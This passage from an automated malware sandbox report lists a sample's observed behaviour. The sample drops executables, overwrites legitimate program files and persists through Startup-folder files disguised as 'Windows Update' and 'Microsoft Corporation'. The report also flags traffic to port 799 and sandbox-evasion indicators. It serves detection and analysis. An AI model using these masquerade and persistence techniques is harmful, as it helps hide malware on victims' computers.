Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\system.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\server.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Notepad.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Documents\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Windows\SysWOW64\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Favorites\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Program Files (x86)\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Desktop\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Jump to dropped file
Drops PE files to the program root directory (C:\Program Files)
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Program Files (x86)\Explower.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Windows\SysWOW64\Explower.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 3550000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 4360000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 3F60000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: 3D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: 3810000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 33B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 40A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 33B0000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 2F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 3D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 3220000 memory commit | memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread delayed: delay time: 922337203685477 Jump to behavior
